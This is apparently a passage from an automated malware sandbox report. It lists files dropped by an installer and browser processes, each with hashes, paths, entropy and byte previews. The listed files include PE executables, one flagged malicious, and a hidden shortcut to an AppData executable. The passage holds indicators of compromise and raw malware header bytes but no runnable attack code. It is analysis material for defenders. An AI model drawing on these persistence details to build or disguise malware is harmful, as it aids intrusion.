                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.f.6.O.J.F.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.S.U.X.h.7.S.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                  Entropy (8bit):4.000632576035383
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:bYla01B00R1UoX7WYprxGGPlzQhAaFeiww1:b4l1B00Yyjoh2aFeiw4
                                                                                                                                                                  MD5:233F34DA962B8B3A2C66A353DC79E2B5
                                                                                                                                                                  SHA1:4CFC785A9A51A3158CA37C6CD2A5D482C521313A
                                                                                                                                                                  SHA-256:23F45BD445E791D789CC92384A7A0155EB1028E109B264B897A1A3F43F3CBE4F
                                                                                                                                                                  SHA-512:F5B99C1CE6B9114FADE2BDDA002E65FB11E29C5A96847D127A2E7CEE4D300CDB2D496788A9F0C621993E6951965C04ED76F9DC475A4A38CD906BAC6BA3FD30C5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".5.B.i.3.H.o.l.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.S.U.X.h.7.S.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                  Entropy (8bit):3.9107320766454494
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xGxl9Il8u5z4rlUKvEhX8R6cXMHoyoD/Igbkz4PBd/vc:asYfOltv4XcXMH3kAgbA44
                                                                                                                                                                  MD5:C81184F9D428A6E9CA5340EA3C34EE84
                                                                                                                                                                  SHA1:01ED8653DC78908B645B631DCE2146EDBB695E0A
                                                                                                                                                                  SHA-256:FD76ED97D54BDB0AC11023B2D7BE440EAB0B0816833AC9E74CA000A3FA60ED27
                                                                                                                                                                  SHA-512:3FEF56A1B584A02F8B3C53CE0FC10AF8A6BC10FB40B65487EE2C2BA0F87677B9465986556DBA8BE78691C5367839F2E20F17C60B7F7EB23531C19F0AA9E9AF51
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".4.n.T.O.T.1.p./.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.S.U.X.h.7.S.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5698949
                                                                                                                                                                  Entropy (8bit):7.732605304689901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:KZYCs8JG/DzFEt9TGa7dm+vj23KunPJbyDoxTI8mTaNBQtycgnt9b9:hz+G/D5ATGa7UcyVxUDAPv9b9
                                                                                                                                                                  MD5:0D46ACA484009FCE8AF1DF2994AF7D80
                                                                                                                                                                  SHA1:E8F02F5EF00F1457E18FA542D519EF2CE4EC08DE
                                                                                                                                                                  SHA-256:6527F5C3C45EE6FB350828C84D1614A3D78CCB4D4CB33C47F18A068BE44870B0
                                                                                                                                                                  SHA-512:1FB0C92B6F1BF04428201C8C55E96342623EF1896642C2B567E324B815AE467C6477BFBD5EA0036DE5A2B0B99CF9773AE5F706794741775F97B3038563E2AC56
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5698949
                                                                                                                                                                  Entropy (8bit):7.732605053098858
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:dZYCs8JG/DzFEt9TGa7dm+vj23KunPJbyDoxTI8mTaNBQtycgnt9b9:Uz+G/D5ATGa7UcyVxUDAPv9b9
                                                                                                                                                                  MD5:DAACC5B4FDC93ED803C4150300BB6696
                                                                                                                                                                  SHA1:97727BF0EE8D60ED4AF8BE28762F3498DF3157A7
                                                                                                                                                                  SHA-256:1E2BC17A3D25A52006231731A303BE20D15A092FAF013969ABBF8B36957F668E
                                                                                                                                                                  SHA-512:0EB07077C61D35FBD94E73902B7EEE33F756BB1F11507B5F37734E26F391816C95A42E262C06C452BCDB51267698931FE434DE7BC710F9499F8440B084E2F900
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                  Entropy (8bit):7.983996634657522
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                  MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                  SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                  SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                  SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1642130
                                                                                                                                                                  Entropy (8bit):7.993199873349357
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:24576:CWsTHqd4xsbp1EuqYhz38cWN/Y2ucp5gMDQNFnwZXKLl4CSkGpyu0GAZYUWX6JNN:CnKd4sbp1/lAcOMIQtAMl4CShmYG3N
                                                                                                                                                                  MD5:E6A31B826ACE4BE80044EC2A52497884
                                                                                                                                                                  SHA1:2600B612B4DC2CC8564F80CF0157E568A8A62F99
                                                                                                                                                                  SHA-256:1698C9E8BE6D9A3B20E0E505E22F0CD30BC8B8C337F899DDBD47478C251CBA66
                                                                                                                                                                  SHA-512:FA4942C7DDE508329E2AE96A6710DDCBF0B8352E002D863FB06BBB426D968700FBBA5113843CA19CB1C9CE7DEB710B1F0AE333240FCFE70E3315BC35772D0D79
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                  Entropy (8bit):5.4134494108513085
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:+DRbybAIeLLznQugDRbZH8DRbScP2w3DRbScP2MSDRMgcP2Uf63rWDRgcP2skDRw:UV0xYnQuOVUVdHVdoS3h63rsRlqROv
                                                                                                                                                                  MD5:6453F9C690DC633C123402C081BF1302
                                                                                                                                                                  SHA1:5DD1F65DBAC20BB7FD7C02C96C12C1E54ADEC46F
                                                                                                                                                                  SHA-256:C835E4217B3F99CB13998BFE8DF7C3027642FC434A81E00DB1D0B56C293E302C
                                                                                                                                                                  SHA-512:747C273A5B446309A0D4570404A07F40A78FD54CA18E87CD0730C2DDA85DF094018DD36683B315349FAB9A057E7D712ECDBA9CB87E2852A56B501D45068FAEA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[1CC0:1CC4][2025-01-06T17:16:34]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe..[1CC0:1CC4][2025-01-06T17:16:34]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\w3245.exe -burn.filehandle.attached=688 -burn.filehandle.self=692'..[1CC0:1CC4][2025-01-06T17:16:34]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\w3245.exe'..[1CC0:1CC4][2025-01-06T17:16:34]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1CC0:1CC4][2025-01-06T17:16:35]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106171635.log'..[1CC0:1CC4][2025-01-06T17:16:36]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'..[1CC0:1CC4][2025-01-06T17:16:36]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'..
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2364728
                                                                                                                                                                  Entropy (8bit):6.606009669324617
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                  MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                  SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                  SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                  SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: 9mauyKC3JW.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                                                                                  • Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: UolJwovI8c.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ONHQNHFT.msi, Detection: malicious, Browse
                                                                                                                                                                  • Filename: es.hta, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 6 21:16:37 2025, mtime=Mon Jan 6 21:16:38 2025, atime=Fri Jan 3 17:35:24 2025, length=6487736, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):926
                                                                                                                                                                  Entropy (8bit):5.005440842644019
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:84ZlfCw4qd90WCNndY//I4kLG2KaOOLQwD/mtYjAK2rHky5uUkRUJ6bwD/cpvBmV:84OYtyn+NGua1i8AK2sRUUocpvBm
                                                                                                                                                                  MD5:737F8ED9FF325184383F6B36089D0C0C
                                                                                                                                                                  SHA1:631FAB03334B1EF674F849C87CF403DB144D3AD5
                                                                                                                                                                  SHA-256:90795BCCB67904AFA03B67DE1065DEE6C4481A0986442EB1B225A308082A78D6
                                                                                                                                                                  SHA-512:EDBCC6E526087D2245F22ACCD1335569EDCF28807EF0E03FEE3B8E972222337D121D86FD76EDBD3186F108EE4E65FE73D0B1081D9BCFA70266A07B5A647D492E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L..................F.... .....h..`.......`....]@.^....b.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......`..o.4..`......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^&Z.............................%..A.p.p.D.a.t.a...B.V.1.....&Z....Roaming.@......CW.^&Z.............................VW.R.o.a.m.i.n.g.....^.1.....&Z....TASKMA~1..F......&Z..&Z......R......................L0.T.a.s.k.M.a.n.a.g.e.....r.2...b.#Zl. .RESCUE~1.EXE..V......&Z..&Z................................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......k...............-.......j...........J........C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.a.s.k.M.a.n.a.g.e.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......210979...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):76319
                                                                                                                                                                  Entropy (8bit):7.996132588300074
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6w6DLZ8:GdS8scZNzFrMa4M+lK5/nEDd8
                                                                                                                                                                  MD5:24439F0E82F6A60E541FB2697F02043F
                                                                                                                                                                  SHA1:E3FAA84B0ED8CDD2268D53A0ECC6F3134D5EBD8F
                                                                                                                                                                  SHA-256:B24DD5C374F8BB381A48605D183B6590245EE802C65F643632A3BE9BB1F313C5
                                                                                                                                                                  SHA-512:8FD794657A9F80FDBC2350DC26A2C82DFD82266B934A4472B3319FDB870841C832137D4F5CE41D518859B8B1DA63031C6B7E750D301F87D6ECA45B958B147FCD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                  Entropy (8bit):5.372304412078899
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YEW3Lr9YTL56s/uW6MTDTpgQTQJjDrwv/uW6MqGapJ56s/C:YTbrgL56s/NBnTpgS0Dkv/NBWJ56s/C
                                                                                                                                                                  MD5:73E2697E6B18A897934E5590865F435D
                                                                                                                                                                  SHA1:7CEB2FBCE3AED436D71AD954701A73ED7BE45A89
                                                                                                                                                                  SHA-256:08648E98F4AB79DAB7EAA2330CD1E260897ABF6547CD5130CB2D3DB9E7047B19
                                                                                                                                                                  SHA-512:FE5C58949822074C258439D288D543479534DFA633C7806BD68095CBF7DE82D81A3C88FF07E129ED73AB6EB1D3E343A0B432E02A148F088AEA6B7E3EFFE1971F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"logTime": "0106/221806", "correlationVector":"PFqPU4T49qyXiuMJLKLnYj","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0106/221808", "correlationVector":"3B532141AB13436FAC36659AE69EA59B","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0106/221808", "correlationVector":"21iO4+2HPbyCUiNtnZD/Kp","action":"EXTENSION_UPDATER", "result":""}.
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2602496
                                                                                                                                                                  Entropy (8bit):6.716476069650749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                                  MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                                  SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                                  SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                                  SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2602496
                                                                                                                                                                  Entropy (8bit):6.716476069650749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                                  MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                                  SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                                  SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                                  SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                  Encrypted:false
